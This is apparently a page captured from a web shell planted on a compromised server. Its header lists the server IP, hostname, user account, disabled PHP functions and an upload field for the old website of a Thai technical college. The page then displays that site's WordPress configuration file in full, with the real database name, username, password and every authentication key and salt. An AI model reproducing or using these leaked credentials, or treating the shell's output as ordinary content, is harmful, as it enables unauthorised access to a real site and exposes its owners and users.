| Server IP : 27.254.66.5 / Your IP : 216.73.217.39 Web Server : Apache/2 System : Linux cs82.hostneverdie.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64 User : technic2 ( 1951) PHP Version : 7.4.30 Disable Function : apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd,exec, fp, fput, highlight_file, ini_alter, ini_restore, inject_code, passthru,phpAds_remoteInfo, phpAds_XmlRpc,phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid,posix_setuid, posix_setuid, posix_uname,proc_open,proc_close, proc_get_status, proc_nice, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode, show_source,sleep,pcntl_exec,virtual,suexec,dbmopen,dl,symlink,disk_free_space,diskfreespace,leak MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/technic2/domains/technicrayong.ac.th/public_html/old-website/vectv/ |
Upload File : |
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'technicray_vectv');
/** MySQL database username */
define('DB_USER', 'technicray_vectv');
/** MySQL database password */
define('DB_PASSWORD', 'JoeMan99');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'ESsJsWWbvJL@;-sge>4LIK:`SU0uPJ|h12$xWb_xsPN@^?WANW`!Tpm8HI9<m,?R');
define('SECURE_AUTH_KEY', 'H -SYo@<0M^ biG[x_5$lk)wWtX^50UZ]kBZw}%j7^We*2/A4}v9Rc`S=-Cqp%#r');
define('LOGGED_IN_KEY', 'K07A2YVi;5zRvq9A,`#*XsxoY/FZZ=e2k1CGul:[,kj+m]$40r@Bmla`-]f+O!tw');
define('NONCE_KEY', ';MiF=Cy,gtL5p!WE6X.]dFpR| ;yXV-UB,ZhIb/5o/e:c@5K|!g7%+>:cZjdlp6O');
define('AUTH_SALT', 'd#tm.:zQ3+a/&6+ o:<L.sVP-BRv_UW@vf?7F3EyPjA-PIyvRAZa1Va=b$B++2|(');
define('SECURE_AUTH_SALT', 'U#+Ag%d[Fi}v%3-]B@76-QftXUv-|<kqH%{YNEvN/O2dsj0@Td$Pa$>.rt8,O(J|');
define('LOGGED_IN_SALT', '<^UbR7o[7TTH-TaYd0+,VN#RdJ]P3U[1*k.qeCHa:G/>CcAkwrS6/kK |$Tz2__g');
define('NONCE_SALT', '}gX[Tb1D<;e:iQ4;E(o%^R-R=?xr:{sPo2SD3:8]Bpcs={:J71glEP|]fu]$^qt5');
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the Codex.
*
* @link https://codex.wordpress.org/Debugging_in_WordPress
*/
define('WP_DEBUG', false);
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');